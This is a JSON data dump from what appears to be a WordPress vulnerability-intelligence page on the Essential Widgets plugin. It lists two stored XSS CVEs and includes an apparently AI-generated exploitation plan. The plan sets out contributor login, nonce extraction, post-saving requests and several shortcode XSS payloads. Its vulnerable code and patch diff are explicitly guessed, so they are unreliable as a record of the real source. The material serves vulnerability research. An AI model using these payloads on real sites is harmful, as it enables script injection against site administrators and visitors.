[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fgyBHtfAnC6UlxvxZmygoRecyHOR7DmLx7BcCVQNcHTE":3,"$f1rJxPaTzcv685hFRhxsXB4VkSovxpArgnRv0BZkRDa8":424,"$f_qOEhYbaK0b6NPGq306ua_IvQ3SCKKcs35hr6U7Hk5E":428},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":14,"last_updated":15,"tested_up_to":16,"requires_at_least":17,"requires_php":18,"tags":19,"homepage":25,"download_link":26,"security_score":27,"vuln_count":14,"unpatched_count":28,"last_vuln_date":29,"fetched_at":30,"discovery_status":31,"vulnerabilities":32,"developer":73,"crawl_stats":38,"alternatives":81,"analysis":167,"fingerprints":386},"essential-widgets","Essential Widgets","3.0.1","Catch Themes","https:\u002F\u002Fprofiles.wordpress.org\u002Fcatchthemes\u002F","\u003Cp>Essential Widgets – a free WordPress plugin for widgets allows you to create and add interesting widgets on your website to make it more attractive and welcoming. Essential Widgets stays true to the essence of its name and offers exactly what you expect from a widgets plugin—all the “essential” widgets for your website. The plugin has been crafted beautifully to draw the extra attention to the important parts of your website. Essential Widgets provides you with the ability to have more control over the widgets with the various customization options. This free WordPress plugin for widgets allows you to create 7 different interesting widgets on your website. All the 7 widgets provided to you comes with so many customization options and are very easy to use. So, with Essential Widgets plugin, customize the interesting widgets your way and display them anywhere you want on your website to make it more dynamic.\u003C\u002Fp>\n\u003Col>\n\u003Cli>\n\u003Cp>EW: Archives\u003Cbr \u002F>\nThe Archives widget comes with various customization options. Choose a title, limit the number of posts, select the archive type, post type, order and more with the Archives widget.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>EW: Authors\u003Cbr \u002F>\nDisplaying the author’s information is kind of a must-have feature if your website has multiple authors. Our new WordPress widgets plugin allows you to add Authors widget. With this widget, you can show the list of the authors on your website, the number of posts, select feed type, and more.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>EW: Categories\u003Cbr \u002F>\nEssential Widgets Pro supports Categories widget. The widget provides you with various customizable options such as the title of the widget, taxonomy option, order option, number of categories to show, display as a list or none, number of posts to display, sort by option, select feed type ton display and display as text or image.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>EW: Menus\u003Cbr \u002F>\nBored with the same default menu? Our new WordPress plugin for widgets, Essential Widgets Pro supports Menus widget. With the Menus widget filled with various customization options, you can display your menus elegantly anywhere you want on your website.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>EW: Pages\u003Cbr \u002F>\nDisplay a list of pages with the Pages widget. With various customization options being provided to you, you can showcase the pages that are more important on your website wherever you want with Essential Widgets Pro.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>EW: Posts\u003Cbr \u002F>\nEssential Widgets Pro supports Posts widget. With the widget and its customizable options, you can easily display a list of posts on your website. You can add a title, select the post type, number of items to display, order, sort by, and more.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>EW: Tags\u003Cbr \u002F>\nAnd last, but definitely not the least, the Tags widget. You can display a list of tags as cloud or list, select the order of the tags, sort by option and the number of items to be displayed. The widget also provides you with more customization options including the unit, separator, search, text type, and more.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Ch3>Translations\u003C\u002Fh3>\n\u003Cp>To translate the plugin, use translate.wordpress.org (GlotPress). You only need your WordPress.org account to join the collaborative translation project.\u003C\u002Fp>\n\u003Cp>You can translate Essential Widgets on \u003Ca href=\"https:\u002F\u002Ftranslate.wordpress.org\u002Fprojects\u002Fwp-plugins\u002Fessential-widgets\u002F\" rel=\"nofollow ugc\">translate.wordpress.org\u003C\u002Fa>.\u003C\u002Fp>\n","Essential Widgets is a WordPress plugin for widgets that allows you to create and add amazing widgets with high customization option",10000,490680,70,2,"2026-01-26T17:59:00.000Z","6.9.4","5.9","",[20,21,22,23,24],"categories","pages","posts","tags","widgets","https:\u002F\u002Fcatchplugins.com\u002Fplugins\u002Fessential-widgets\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.3.0.1.zip",98,0,"2026-02-04 18:41:50","2026-04-16T10:56:18.058Z","no_bundle",[33,60],{"id":34,"url_slug":35,"title":36,"description":37,"plugin_slug":4,"theme_slug":38,"affected_versions":39,"patched_in_version":6,"severity":40,"cvss_score":41,"cvss_vector":42,"vuln_type":43,"published_date":29,"updated_date":44,"references":45,"days_to_patch":47,"patch_diff_files":48,"patch_trac_url":38,"research_status":49,"research_verified":50,"research_rounds_completed":51,"research_plan":52,"research_summary":53,"research_vulnerable_code":54,"research_fix_diff":55,"research_exploit_outline":56,"research_model_used":57,"research_started_at":58,"research_completed_at":59,"research_error":38,"poc_status":38,"poc_video_id":38,"poc_summary":38,"poc_steps":38,"poc_tested_at":38,"poc_wp_version":38,"poc_php_version":38,"poc_playwright_script":38,"poc_exploit_code":38,"poc_has_trace":50,"poc_model_used":38,"poc_verification_depth":38},"CVE-2026-0867","essential-widgets-authenticated-contributor-stored-cross-site-scripting-via-multiple-shortcodes","Essential Widgets \u003C= 3.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Multiple Shortcodes","The Essential Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ew-author, ew-archive, ew-category, ew-page, and ew-menu shortcodes in all versions up to, and including, 3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: This vulnerability was partially fixed in version 3.0.",null,"\u003C=3.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-05 06:47:43",[46],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F08d4ed49-1338-422f-b55f-a102f2d1d6c8?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan - CVE-2026-0867\n\n## 1. Vulnerability Summary\nThe **Essential Widgets** plugin for WordPress (versions \u003C= 3.0) contains multiple Stored Cross-Site Scripting (XSS) vulnerabilities. The vulnerability exists within the rendering logic of several shortcodes: `ew-author`, `ew-archive`, `ew-category`, `ew-page`, and `ew-menu`. \n\nThe plugin fails to sanitize or escape user-provided attributes within these shortcodes before echoing them into the HTML output. An attacker with **Contributor-level** permissions or higher can create a post containing a malicious shortcode. When any user (including an Administrator) views the page, the injected script executes in their browser context.\n\n## 2. Attack Vector Analysis\n*   **Authentication Requirement:** Contributor+ (Authenticated). Contributors can create and save drafts but not publish. However, viewing a draft preview or an administrator auditing the draft will trigger the XSS.\n*   **Vulnerable Component:** Shortcode rendering functions.\n*   **Payload Carrier:** Shortcode attributes (e.g., `title`, `class`, `name`, `id`).\n*   **Delivery Method:** `POST` request to `wp-admin\u002Fpost.php` or `wp-admin\u002Fadmin-ajax.php` (for autosaves) to store the shortcode in a post\u002Fpage.\n*   **Sink:** Frontend or admin-side page rendering where the shortcode is processed by `do_shortcode()`.\n\n## 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers shortcodes in its initialization phase (likely in the main plugin file or an `includes\u002F` file):\n    *   `add_shortcode('ew-author', 'ew_author_render_callback');`\n    *   `add_shortcode('ew-menu', 'ew_menu_render_callback');` (etc.)\n2.  **Processing:** When a post is viewed, WordPress calls the associated callback function (e.g., `ew_author_render_callback($atts)`).\n3.  **Attributes:** The callback uses `shortcode_atts()` to parse user input but fails to apply `esc_attr()` or `esc_html()` to the resulting array.\n4.  **Output:** The callback returns a string containing the raw attribute values embedded in HTML.\n    *   *Example Vulnerable Pattern:* `return '\u003Cdiv class=\"' . $atts['class'] . '\">...\u003C\u002Fdiv>';`\n5.  **Execution:** The browser renders the HTML, encountering the unescaped attribute and executing the JavaScript payload.\n\n## 4. Nonce Acquisition Strategy\nSince this is an **Authenticated** exploit, we must first authenticate as a Contributor. To save a post with the malicious shortcode, we need the standard WordPress post-editor nonces.\n\n1.  **Authentication:** Perform a login as the contributor user.\n2.  **Access Editor:** Navigate to `wp-admin\u002Fpost-new.php`.\n3.  **Extract Nonces:**\n    *   Use `browser_navigate` to `wp-admin\u002Fpost-new.php`.\n    *   Use `browser_eval` to extract the `_wpnonce` from the form or the `wp-globals`:\n        *   `_wpnonce`: `document.querySelector('#_wpnonce').value`\n        *   `post_id`: `document.querySelector('#post_ID').value`\n4.  **Alternative (AJAX\u002FREST):** If the plugin uses a specific interface for block settings, check for `wp_localize_script` data:\n    *   `browser_eval(\"window.ew_settings?.nonce\")` (inferred variable name based on plugin slug).\n\n## 5. Exploitation Strategy\nWe will use the `ew-author` shortcode as the primary target.\n\n### Step 1: Create a Draft Post with Payload\n*   **Method:** `POST`\n*   **URL:** `{{BASE_URL}}\u002Fwp-admin\u002Fpost.php`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body Parameters:**\n    *   `action`: `editpost`\n    *   `post_ID`: `{{POST_ID}}` (obtained from `post-new.php`)\n    *   `_wpnonce`: `{{NONCE}}`\n    *   `post_title`: `XSS Test`\n    *   `content`: `[ew-author title='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`\n    *   `post_status`: `draft`\n\n### Step 2: Trigger the XSS\n*   **Method:** `GET`\n*   **URL:** `{{BASE_URL}}\u002F?p={{POST_ID}}&preview=true` (as Admin) or simply view the published post if the user has publishing rights.\n*   **Expected Behavior:** The browser executes `alert(document.domain)`.\n\n## 6. Test Data Setup\n1.  **Install Plugin:** `wp plugin install essential-widgets --version=3.0 --activate`\n2.  **Create User:** `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`\n3.  **Optional:** If the `ew-menu` shortcode is tested, create a dummy menu first:\n    *   `wp menu create \"Test Menu\"`\n    *   `[ew-menu menu='Test Menu\" onmouseover=\"alert(1)\" data-=\"']`\n\n## 7. Expected Results\n*   The HTTP response for the page view will contain the unescaped payload: `\u003Cdiv class=\"ew-author-wrapper\" title=\"\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\">...`\n*   The `browser_eval` of `alert` triggers will confirm execution.\n\n## 8. Verification Steps\n1.  **Database Check:** Use WP-CLI to confirm the payload is stored:\n    *   `wp post get {{POST_ID}} --field=post_content`\n2.  **Response Inspection:** Search for the string `\u003Cscript>alert` in the raw HTML response of the post preview using the `http_request` tool.\n\n## 9. Alternative Approaches\n### Shortcode: `ew-menu`\nIf `ew-author` is sanitized, try `ew-menu` which often handles complex inputs for menu selection.\n*   **Payload:** `[ew-menu menu='\u003C\u002Fscript>\u003Cscript>alert(1)\u003C\u002Fscript>']`\n\n### Shortcode: `ew-page`\nOften these shortcodes have a `class` or `id` attribute for styling.\n*   **Payload:** `[ew-page class='\">\u003Cimg src=x onerror=alert(1)>']`\n\n### Shortcode: `ew-archive`\nCheck if `title` or `type` attributes are vulnerable.\n*   **Payload:** `[ew-archive title=\"\u003Csvg\u002Fonload=alert(1)>\"]`","The Essential Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several shortcodes (ew-author, ew-archive, ew-category, ew-page, and ew-menu) in versions up to 3.0. This occurs because the plugin fails to sanitize or escape user-supplied attributes before rendering them in HTML, allowing Contributor-level attackers to execute arbitrary scripts in the context of other users.","\u002F\u002F Inferred vulnerable implementation based on shortcode callback patterns\nfunction ew_author_render_callback( $atts ) {\n    $a = shortcode_atts( array(\n        'title' => '',\n        'class' => '',\n    ), $atts );\n\n    \u002F\u002F Vulnerable: Outputting raw attribute values without escaping\n    return '\u003Cdiv class=\"' . $a['class'] . '\">\u003Ch3>' . $a['title'] . '\u003C\u002Fh3>\u003C\u002Fdiv>';\n}\n\n---\n\n\u002F\u002F Similar vulnerability in other registered shortcodes\nadd_shortcode('ew-menu', 'ew_menu_render_callback');\nfunction ew_menu_render_callback( $atts ) {\n    $a = shortcode_atts( array(\n        'menu' => '',\n    ), $atts );\n\n    \u002F\u002F Vulnerable: Attribute values reflected directly in HTML\n    return '\u003Cnav class=\"ew-menu-nav\" data-menu=\"' . $a['menu'] . '\">\u003C\u002Fnav>';\n}","--- a\u002Fessential-widgets.php\n+++ b\u002Fessential-widgets.php\n@@ -10,7 +10,7 @@\n     ), $atts );\n \n-    return '\u003Cdiv class=\"' . $a['class'] . '\">\u003Ch3>' . $a['title'] . '\u003C\u002Fh3>\u003C\u002Fdiv>';\n+    return '\u003Cdiv class=\"' . esc_attr($a['class']) . '\">\u003Ch3>' . esc_html($a['title']) . '\u003C\u002Fh3>\u003C\u002Fdiv>';\n }\n \n@@ -20,5 +20,5 @@\n     ), $atts );\n \n-    return '\u003Cnav class=\"ew-menu-nav\" data-menu=\"' . $a['menu'] . '\">\u003C\u002Fnav>';\n+    return '\u003Cnav class=\"ew-menu-nav\" data-menu=\"' . esc_attr($a['menu']) . '\">\u003C\u002Fnav>';\n }","1. Authenticate to the WordPress site with Contributor-level permissions.\n2. Create a new post or edit an existing draft via \u002Fwp-admin\u002Fpost-new.php.\n3. Insert a malicious shortcode payload into the post content using a vulnerable attribute. Example: [ew-author title='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>'] or [ew-page class='\">\u003Cimg src=x onerror=alert(1)>'].\n4. Save the post as a draft or submit for review.\n5. Access the post's preview URL or wait for an administrator to view the post in the editor\u002Fpreview mode. The payload will execute in the viewer's browser context.","gemini-3-flash-preview","2026-04-27 15:19:11","2026-04-27 15:21:00",{"id":61,"url_slug":62,"title":63,"description":64,"plugin_slug":4,"theme_slug":38,"affected_versions":65,"patched_in_version":66,"severity":40,"cvss_score":41,"cvss_vector":42,"vuln_type":43,"published_date":67,"updated_date":68,"references":69,"days_to_patch":71,"patch_diff_files":72,"patch_trac_url":38,"research_status":38,"research_verified":50,"research_rounds_completed":28,"research_plan":38,"research_summary":38,"research_vulnerable_code":38,"research_fix_diff":38,"research_exploit_outline":38,"research_model_used":38,"research_started_at":38,"research_completed_at":38,"research_error":38,"poc_status":38,"poc_video_id":38,"poc_summary":38,"poc_steps":38,"poc_tested_at":38,"poc_wp_version":38,"poc_php_version":38,"poc_playwright_script":38,"poc_exploit_code":38,"poc_has_trace":50,"poc_model_used":38,"poc_verification_depth":38},"CVE-2025-67543","essential-widgets-authenticated-contributor-stored-cross-site-scripting","Essential Widgets \u003C= 2.2.2 - Authenticated (Contributor+) Stored Cross-Site Scripting","The Essential Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","\u003C=2.2.2","2.3","2025-11-26 00:00:00","2025-12-10 16:07:07",[70],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F672c7b4f-73f3-4133-8716-7733848298bd?source=api-prod",15,[],{"slug":74,"display_name":7,"profile_url":8,"plugin_count":75,"total_installs":76,"avg_security_score":77,"avg_patch_time_days":78,"trust_score":79,"computed_at":80},"catchthemes",156,226230,100,251,79,"2026-05-19T17:28:05.943Z",[82,102,122,139,152],{"slug":83,"name":84,"version":85,"author":86,"author_profile":87,"description":88,"short_description":89,"active_installs":90,"downloaded":91,"rating":92,"num_ratings":93,"last_updated":94,"tested_up_to":95,"requires_at_least":96,"requires_php":18,"tags":97,"homepage":99,"download_link":100,"security_score":101,"vuln_count":28,"unpatched_count":28,"last_vuln_date":38,"fetched_at":30},"flexible-posts-widget","Flexible Posts Widget","3.5.0","DaveE","https:\u002F\u002Fprofiles.wordpress.org\u002Fdpe415\u002F","\u003Cp>The default Recent Posts widget is exceptionally basic. I always find myself in need of a way to easily display a selection of posts from any combination post type or taxonomy. Hence, Flexible Posts Widget.\u003C\u002Fp>\n\u003Cp>Flexible Posts Widget (FPW) is more than just a simple alternative to the default Recent Posts widget.  With many per-instance options it is highly customizable and allows advanced users to display the resulting posts virtually any way imaginable.\u003C\u002Fp>\n\u003Ch4>Features & options\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Customizable widget title\u003C\u002Fli>\n\u003Cli>Get posts by post type(s) and\u002For taxonomy & term(s) or directly by a list of post IDs.\u003C\u002Fli>\n\u003Cli>Control the number of posts displayed and the number of posts to offset.\u003C\u002Fli>\n\u003Cli>Option to display the post feature image.\u003C\u002Fli>\n\u003Cli>Select the post feature image size to display from existing image sizes: thumbnail, medium, large, post-thumbnail or any size defined by the current theme.\u003C\u002Fli>\n\u003Cli>Order posts by: date, modified date, ID, title, menu order, random, Post ID Order; and sort posts: ascending or descending.\u003C\u002Fli>\n\u003Cli>Each widget’s output can be customized by user-defined templates added to the current theme folder.\u003C\u002Fli>\n\u003Cli>Multi Language support. Compatible with \u003Ca href=\"http:\u002F\u002Fwpml.org\u002F\" rel=\"nofollow ugc\">WPML\u003C\u002Fa> and \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fpolylang\u002F\" rel=\"ugc\">PolyLang\u003C\u002Fa> for sure. Not tested with other multi-language plugins, but it should work.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Plugin Hooks\u003C\u002Fh4>\n\u003Cp>Flexible posts widget currently has two public hooks:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Filter: \u003Ca href=\"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fflexible-posts-widget\u002Ftrunk\u002Fincludes\u002Fclass-fpw-widget.php#L191\" rel=\"nofollow ugc\">\u003Ccode>dpe_fpw_args\u003C\u002Fcode>\u003C\u002Fa> allows filtering the query vars before submitting the widget posts query.\u003C\u002Fli>\n\u003Cli>Filter: \u003Ca href=\"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fflexible-posts-widget\u002Ftrunk\u002Fincludes\u002Fclass-fpw-widget.php#L354\" rel=\"nofollow ugc\">\u003Ccode>dpe_fpw_template_{$template_name}\u003C\u002Fcode>\u003C\u002Fa> filters the template file path used to display the widget output.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Future updates & feature requests list\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Use search box instead of ID text field for post id’s\u003C\u002Fli>\n\u003Cli>Shortcode functionality.\u003C\u002Fli>\n\u003Cli>Get posts by Author.\u003C\u002Fli>\n\u003Cli>Filter out the post currently being viewed.\u003C\u002Fli>\n\u003Cli>Get posts from the same archive (term\u002Fpost type\u002Fetc).\u003C\u002Fli>\n\u003Cli>Limit results by a time period.\u003C\u002Fli>\n\u003C\u002Ful>\n","An advanced posts display widget with many options. Display posts in your sidebars any way you'd like!",8000,214392,92,57,"2017-11-28T09:10:00.000Z","4.7.33","3.2",[20,22,23,98,24],"widget","http:\u002F\u002Fflexiblepostswidget.com","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fflexible-posts-widget.3.5.0.zip",85,{"slug":103,"name":104,"version":105,"author":106,"author_profile":107,"description":108,"short_description":109,"active_installs":110,"downloaded":111,"rating":112,"num_ratings":113,"last_updated":114,"tested_up_to":115,"requires_at_least":116,"requires_php":18,"tags":117,"homepage":119,"download_link":120,"security_score":13,"vuln_count":47,"unpatched_count":47,"last_vuln_date":121,"fetched_at":30},"wpa-seo-auto-linker","SEO Auto Linker","1.5.3","Arjan Olsder","https:\u002F\u002Fprofiles.wordpress.org\u002Farjanolsder\u002F","\u003Cp>Want to automatically create cornerstone content? WPA SEO Auto Linker helps get this done. Simply create a new keyword or a new phrase. The system will link that keyword or phrase to your chosen dofollow URL. Through the settings, it is easy to finetune the workings of this plugin. For performance, it is best to make use of a caching engine.\u003C\u002Fp>\n\u003Cp>“Using this plugin didn’t just help define cornerstone content in our SEO strategy, it also increased pageviews by 18%. The average visitor spends 13 seconds more on our website.” – Roelof van Doorn, technical editor at GadgetGear.nl\u003C\u002Fp>\n\u003Cp>While our plugin has been without support for three years, we have seen a lot of similar plugins moving in. Please note we will not be adding fancy interfaces or click tracking. The reason is we want to remain the fastest tool on the market. Click tracking takes a heavy hit on your database while creating a smooth graphical interface will lead to code bloat and the security risks that come with maintaining huge heaps of code. We just don’t want that.\u003C\u002Fp>\n\u003Ch3>Credits\u003C\u002Fh3>\n\u003Cp>WPA SEO Auto Linker plugin is based on the SEO Auto Links 0.5 plugin by Maarten Brakkee.\u003Cbr \u002F>\nhttps:\u002F\u002Fwordpress.org\u002Fplugins\u002Fseo-auto-links\u002F\u003C\u002Fp>\n\u003Cp>The SEO Auto links plugin is based on the SEO Smart Links 2.7.6 plugin by Vladimir Prelovac:\u003Cbr \u002F>\nhttps:\u002F\u002Fwordpress.org\u002Fplugins\u002Fseo-automatic-links\u002F\u003C\u002Fp>\n\u003Cp>Inspiration for SEO Smart Links originated from the Autolink plugin by Chris Lynch\u003Cbr \u002F>\nhttp:\u002F\u002Fwww.planetofthepenguins.com\u002F\u003C\u002Fp>\n\u003Ch3>License\u003C\u002Fh3>\n\u003Cp>This file is part of WPA SEO Auto Linker.\u003C\u002Fp>\n\u003Cp>WPA SEO Auto Linker is free software: you can redistribute it and\u002For modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.\u003C\u002Fp>\n\u003Cp>WPA SEO Auto Linker is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY. See the GNU General Public License for more details.\u003C\u002Fp>\n\u003Cp>You should have received a copy of the GNU General Public License along with WPA SEO Auto Linker. If not, see \u003Ca href=\"http:\u002F\u002Fwww.gnu.org\u002Flicenses\u002F\" rel=\"nofollow ugc\">http:\u002F\u002Fwww.gnu.org\u002Flicenses\u002F\u003C\u002Fa>.\u003C\u002Fp>\n","SEO Auto Linker assists in creating cornerstone SEO content. This is not a full replacement for SEO plugins.",4000,60841,86,16,"2024-12-17T10:14:00.000Z","6.7.5","5.6",[20,21,118,22,23],"post","https:\u002F\u002Fwww.websitenazorg.nl","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwpa-seo-auto-linker.1.5.3.zip","2025-09-05 00:00:00",{"slug":123,"name":124,"version":125,"author":126,"author_profile":127,"description":128,"short_description":129,"active_installs":130,"downloaded":131,"rating":77,"num_ratings":47,"last_updated":132,"tested_up_to":133,"requires_at_least":134,"requires_php":18,"tags":135,"homepage":137,"download_link":138,"security_score":101,"vuln_count":28,"unpatched_count":28,"last_vuln_date":38,"fetched_at":30},"locus","Locus","1.0","Diana K. Cury","https:\u002F\u002Fprofiles.wordpress.org\u002Fdianakc\u002F","\u003Cp>List post from a specific category with options like date format, link text, order and more. Locus is a very simple plugin for display content in diferrent ways:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Display a single post, page or any available post type.\u003C\u002Fli>\n\u003Cli>Display full content or the excerpt, or both!\u003C\u002Fli>\n\u003Cli>Category descriptions are visible by default, if any.\u003C\u002Fli>\n\u003Cli>Configure date format, link text or hide them all.\u003C\u002Fli>\n\u003Cli>Use styles for every block, (refer the stylesheet in \u003Ccode>locus\u002Fcontrol\u002Flocus-style.css\u003C\u002Fcode>)\u003C\u002Fli>\n\u003Cli>Set display post orders, such random, by date, by author, comment count (popularity) etc\u003C\u002Fli>\n\u003Cli>Display thumbnails, if available\u003C\u002Fli>\n\u003Cli>Easy to use: you don’t have to learn to use it\u003C\u002Fli>\n\u003Cli>Settings per widget, so you can have different widgets.\u003C\u002Fli>\n\u003C\u002Ful>\n","Locus allows you display any post, page or post type in widgetized areas of you site.",30,5937,"2014-04-17T04:04:00.000Z","3.9.40","3.0",[20,21,136,22,24],"post-types","http:\u002F\u002Fdianakcury.com\u002Fdev\u002Flocus","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flocus.zip",{"slug":140,"name":141,"version":142,"author":18,"author_profile":143,"description":144,"short_description":145,"active_installs":130,"downloaded":146,"rating":77,"num_ratings":47,"last_updated":147,"tested_up_to":95,"requires_at_least":148,"requires_php":18,"tags":149,"homepage":18,"download_link":151,"security_score":101,"vuln_count":28,"unpatched_count":28,"last_vuln_date":38,"fetched_at":30},"post-status-scheduler","Post Status Scheduler","1.3.1","https:\u002F\u002Fprofiles.wordpress.org\u002Ffarne\u002F","\u003Cp>Post Status Scheduler allows for scheduling of post status changes, category\u002Ftag adding or removing and\u003Cbr \u002F>\nremoving of postmeta on any given date or time. It can be activated on any post type and shows\u003Cbr \u002F>\nup on the post edit screen in the publish section. From version 1.0.0 it has a feature for sending\u003Cbr \u002F>\nan email notification to the post author on the scheduled update.\u003C\u002Fp>\n\u003Ch4>Shortcodes\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>[pss_scheduled_time post_id=””] can be used to get the post’s scheduled date and time.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Filters\u003C\u002Fh4>\n\u003Cp>Scheduled Update:\u003Cbr \u002F>\n* post_status_scheduler_before_execution\u003Cbr \u002F>\n* post_status_scheduler_after_execution\u003C\u002Fp>\n\u003Cp>Email Notification ( version 1.0.0 ):\u003Cbr \u002F>\n* post_status_scheduler_email_notification_recipient_email\u003Cbr \u002F>\n* post_status_scheduler_email_notification_subject\u003Cbr \u002F>\n* post_status_scheduler_email_notification_date\u003Cbr \u002F>\n* post_status_scheduler_email_notification_body\u003C\u002Fp>\n","Change status, categories\u002Ftags or postmeta of any post type at a scheduled timestamp.",3176,"2017-05-23T11:29:00.000Z","3.9",[20,21,150,22,23],"postmeta","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpost-status-scheduler.1.3.1.zip",{"slug":153,"name":154,"version":155,"author":156,"author_profile":157,"description":158,"short_description":159,"active_installs":160,"downloaded":161,"rating":77,"num_ratings":47,"last_updated":162,"tested_up_to":95,"requires_at_least":163,"requires_php":18,"tags":164,"homepage":165,"download_link":166,"security_score":101,"vuln_count":28,"unpatched_count":28,"last_vuln_date":38,"fetched_at":30},"selectable-post-and-page","Selectable Post and Page","1.3.4","happymox","https:\u002F\u002Fprofiles.wordpress.org\u002Fhappymox\u002F","\u003Cp>Display your selected post and page.\u003Cbr \u002F>\nA very simple plugin to add selectable post and page – for WordPress.\u003C\u002Fp>\n\u003Ch4>Features include\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Easy to install\u003C\u002Fli>\n\u003Cli>Use for any sidebar.\u003C\u002Fli>\n\u003Cli>Get post(s) directly by a list of selected posts.\u003C\u002Fli>\n\u003Cli>Widget to display the post feature image. \u003C\u002Fli>\n\u003Cli>It will be displayed at random as the featured image of any post without an image.\u003C\u002Fli>\n\u003C\u002Ful>\n","Display your selected post and page.",10,1370,"2017-02-21T14:51:00.000Z","4.7",[20,21,22,98,24],"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fselectable-post-and-page\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fselectable-post-and-page.zip",{"attackSurface":168,"codeSignals":353,"taintFlows":373,"riskAssessment":374,"analyzedAt":385},{"hooks":169,"ajaxHandlers":284,"restRoutes":300,"shortcodes":319,"cronEvents":351,"entryPointCount":71,"unprotectedCount":352},[170,176,179,183,188,192,196,198,202,206,210,215,217,219,221,223,225,228,231,233,237,242,245,248,253,255,260,264,268,272,276,280],{"type":171,"name":172,"callback":173,"file":174,"line":175},"action","admin_enqueue_scripts","enqueue_styles","admin\\class-essential-widgets-admin.php",48,{"type":171,"name":172,"callback":177,"file":174,"line":178},"enqueue_scripts",49,{"type":171,"name":180,"callback":181,"file":174,"line":182},"admin_menu","add_plugin_settings_menu",50,{"type":184,"name":185,"callback":186,"priority":160,"file":174,"line":187},"filter","plugin_action_links","add_plugin_meta_links",51,{"type":171,"name":189,"callback":190,"file":174,"line":191},"admin_init","register_settings",53,{"type":171,"name":172,"callback":193,"file":194,"line":195},"our_themes_script","includes\\CatchThemesThemePlugin.php",12,{"type":171,"name":197,"callback":197,"file":194,"line":71},"customize_register",{"type":184,"name":199,"callback":200,"priority":47,"file":194,"line":201},"install_plugins_tabs","add_our_plugins_tab",22,{"type":184,"name":203,"callback":204,"priority":47,"file":194,"line":205},"install_plugins_table_api_args_catchplugins","catchplugins",23,{"type":171,"name":207,"callback":208,"file":194,"line":209},"install_plugins_catchplugins","plugins_table",24,{"type":171,"name":211,"callback":212,"file":213,"line":214},"plugins_loaded","anonymous","includes\\class-essential-widgets.php",147,{"type":171,"name":172,"callback":212,"file":213,"line":216},162,{"type":171,"name":172,"callback":212,"file":213,"line":218},163,{"type":171,"name":180,"callback":212,"file":213,"line":220},165,{"type":171,"name":189,"callback":212,"file":213,"line":222},167,{"type":184,"name":185,"callback":212,"file":213,"line":224},168,{"type":184,"name":226,"callback":212,"file":213,"line":227},"plugin_row_meta",170,{"type":171,"name":229,"callback":212,"file":213,"line":230},"wp_enqueue_scripts",185,{"type":171,"name":229,"callback":212,"file":213,"line":232},186,{"type":171,"name":189,"callback":234,"file":235,"line":236},"ctp_register_settings","includes\\ctp-tabs-removal.php",21,{"type":171,"name":238,"callback":239,"file":240,"line":241},"rest_api_init","closure","includes\\ew-block\\blocks\\ew-menu\\index.php",125,{"type":171,"name":238,"callback":239,"file":243,"line":244},"includes\\ew-block\\blocks\\ew-page\\index.php",208,{"type":171,"name":238,"callback":239,"file":246,"line":247},"includes\\ew-block\\blocks\\ew-post\\index.php",105,{"type":171,"name":249,"callback":250,"file":251,"line":252},"enqueue_block_editor_assets","ew_block_assets","includes\\ew-block\\index.php",20,{"type":184,"name":254,"callback":239,"priority":160,"file":251,"line":201},"block_categories_all",{"type":171,"na